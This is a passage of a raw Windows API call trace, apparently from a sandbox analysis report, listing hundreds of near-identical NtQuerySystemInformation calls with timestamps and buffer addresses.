ResultLength=0x0) [0200.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x40, ResultLength=0x0) [0200.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x40, ResultLength=0x0) [0200.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0200.569] NtQuerySystemInformation (SystemInformationClass=0xb9, 